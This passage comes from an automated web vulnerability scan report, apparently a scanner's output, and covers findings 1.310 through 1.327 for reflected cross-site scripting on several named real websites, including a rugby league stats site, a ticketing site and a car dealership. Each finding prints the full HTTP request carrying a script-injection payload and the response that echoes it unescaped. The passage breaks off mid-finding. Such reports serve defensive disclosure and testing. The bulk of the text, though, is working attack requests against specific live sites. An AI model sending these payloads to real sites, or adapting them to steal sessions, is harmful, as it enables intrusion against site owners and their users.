GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/15/playerid/210/seasonid/7/default.aspx?9ae46"><script>alert(1)</script>7e445c4e218=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:41:36 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 143911
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/9ae46"><script>alert(1)</script>7e445c4e218/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.310. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/336/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/336/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33815"><script>alert(1)</script>63515de53d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/336/seasonid/7/default.aspx?33815"><script>alert(1)</script>63515de53d3=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:42:21 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 143169
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/33815"><script>alert(1)</script>63515de53d3/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.311. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/338/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/338/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2476"><script>alert(1)</script>161d4929ab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/6/playerid/338/seasonid/7/default.aspx?c2476"><script>alert(1)</script>161d4929ab1=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:45:16 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 143138
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/c2476"><script>alert(1)</script>161d4929ab1/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.312. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/145/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/145/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1dec"><script>alert(1)</script>d5de1e8a066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/145/seasonid/7/default.aspx?a1dec"><script>alert(1)</script>d5de1e8a066=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:44:11 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 143281
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/a1dec"><script>alert(1)</script>d5de1e8a066/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.313. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/32/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/32/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46e7b"><script>alert(1)</script>272e2268e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/9/playerid/32/seasonid/7/default.aspx?46e7b"><script>alert(1)</script>272e2268e7=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:41:54 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 142935
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/46e7b"><script>alert(1)</script>272e2268e7/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.314. http://www.premiermediagroup.com.au/opportunities/current-vacancies/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.premiermediagroup.com.au
Path:	/opportunities/current-vacancies/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8704c<script>alert(1)</script>d700fe00244 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /opportunities8704c<script>alert(1)</script>d700fe00244/current-vacancies/ HTTP/1.1
Host: www.premiermediagroup.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /opportunities8704c<script>alert(1)</script>d700fe00244/current-vacancies/
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Tue, 04 Oct 2011 21:50:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<script>
function showError(){
...[SNIP]...
<TD>/opportunities8704c<script>alert(1)</script>d700fe00244/current-vacancies/</TD>
...[SNIP]...

1.315. http://www.premiermediagroup.com.au/opportunities/current-vacancies/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.premiermediagroup.com.au
Path:	/opportunities/current-vacancies/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aa813<script>alert(1)</script>77f13c17454 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /opportunities/current-vacanciesaa813<script>alert(1)</script>77f13c17454/ HTTP/1.1
Host: www.premiermediagroup.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /opportunities/current-vacanciesaa813<script>alert(1)</script>77f13c17454/
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Tue, 04 Oct 2011 21:50:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<script>
function showError(){
...[SNIP]...
<TD>/opportunities/current-vacanciesaa813<script>alert(1)</script>77f13c17454/</TD>
...[SNIP]...

1.316. http://www.proticket.com.au/event.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.proticket.com.au
Path:	/event.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 95e37><script>alert(1)</script>a0444b1f6ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.asp?95e37><script>alert(1)</script>a0444b1f6ac=1 HTTP/1.1
Host: www.proticket.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16299
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 04 Oct 2011 21:50:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property="og:url" content=http://www.proticket.com.au/event.asp?95e37><script>alert(1)</script>a0444b1f6ac=1>
...[SNIP]...

1.317. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9204"><script>alert(1)</script>fe7e56c6e4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventorye9204"><script>alert(1)</script>fe7e56c6e4a/index.htm HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20737
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 21:50:17 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Putnam Chrysler Jeep Dodge | New Chrysler, Dodge, Jeep, Ram dealership in Burlingame, C
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventorye9204"><script>alert(1)</script>fe7e56c6e4a/index.htm" />
...[SNIP]...

1.318. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBbodystyle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the HTML document as plain text between tags. The payload ca887<script>alert(1)</script>2892fa7f0bc was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear&SBbodystyle=clearca887<script>alert(1)</script>2892fa7f0bc&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:29 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 45512

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



   <title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<div>


       Sorry, no clearca887<script>alert(1)</script>2892fa7f0bcs are currently in stock.

                                    To search for other vehicles, please use the Narrow Search bar above.
                           <br />
...[SNIP]...

1.319. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBbodystyle parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBbodystyle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4e6a"><script>alert(1)</script>ad571b26b01 was submitted in the SBbodystyle parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear&SBbodystyle=clearb4e6a"><script>alert(1)</script>ad571b26b01&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:28 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 45516

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear&SBbodystyle=clearb4e6a"><script>alert(1)</script>ad571b26b01&SBprice=clear" />
...[SNIP]...

1.320. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmake parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the HTML document as plain text between tags. The payload 715c2<script>alert(1)</script>2339766ddb2 was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear715c2<script>alert(1)</script>2339766ddb2&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:26 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 46038

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



   <title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<div>


       Sorry, no clear715c2<script>alert(1)</script>2339766ddb2s are currently in stock.

                                    To search for other vehicles, please use the Narrow Search bar above.
                           <br />
...[SNIP]...

1.321. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmake parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBmake request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 428eb"><script>alert(1)</script>def3e0a482f was submitted in the SBmake parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear428eb"><script>alert(1)</script>def3e0a482f&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:26 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 46042

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm?SByear=clear&SBmake=clear428eb"><script>alert(1)</script>def3e0a482f&SBmodel=clear&SBbodystyle=clear&SBprice=clear" />
...[SNIP]...

1.322. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmodel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the HTML document as plain text between tags. The payload 233cc<script>alert(1)</script>479191f170a was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear233cc<script>alert(1)</script>479191f170a&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:28 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 44938

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



   <title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<div>


       Sorry, no clear233cc<script>alert(1)</script>479191f170as are currently in stock.

                                    To search for other vehicles, please use the Narrow Search bar above.
                           <br />
...[SNIP]...

1.323. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBmodel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBmodel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18cb5"><script>alert(1)</script>ee318e82ef was submitted in the SBmodel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear18cb5"><script>alert(1)</script>ee318e82ef&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:27 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 44940

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear18cb5"><script>alert(1)</script>ee318e82ef&SBbodystyle=clear&SBprice=clear" />
...[SNIP]...

1.324. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SBprice parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SBprice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a75"><script>alert(1)</script>9f6bb052df1 was submitted in the SBprice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear&SBbodystyle=clear&SBprice=clear34a75"><script>alert(1)</script>9f6bb052df1 HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:30 GMT
Content-Length: 25195
Connection: close
Cache-Control: no-store

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm?SByear=clear&SBmake=clear&SBmodel=clear&SBbodystyle=clear&SBprice=clear34a75"><script>alert(1)</script>9f6bb052df1" />
...[SNIP]...

1.325. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [SByear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The value of the SByear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc48d"><script>alert(1)</script>6785b80457 was submitted in the SByear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?SByear=clearfc48d"><script>alert(1)</script>6785b80457&SBmake=clear&SBmodel=clear&SBbodystyle=clear&SBprice=clear HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:25 GMT
Content-Length: 25194
Connection: close
Cache-Control: no-store

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm?SByear=clearfc48d"><script>alert(1)</script>6785b80457&SBmake=clear&SBmodel=clear&SBbodystyle=clear&SBprice=clear" />
...[SNIP]...

1.326. http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.putnam-dodge-chrysler-jeep.com
Path:	/used-inventory/index.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5021f"><script>alert(1)</script>121966ddd3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /used-inventory/index.htm?5021f"><script>alert(1)</script>121966ddd3f=1 HTTP/1.1
Host: www.putnam-dodge-chrysler-jeep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Date: Tue, 04 Oct 2011 21:50:16 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: no-store
Content-Length: 148038

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<title>Used Inventory for Putnam Chrysler Jeep Dodge in Burlingame CA 94010 that includes used
...[SNIP]...
<meta property="og:url" content="http://www.putnam-dodge-chrysler-jeep.com/used-inventory/index.htm?5021f"><script>alert(1)</script>121966ddd3f=1" />
...[SNIP]...

1.327. http://www.realestateview.com.au/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.realestateview.com.au
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97020"><script>alert(1)</script>e43dd183868 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

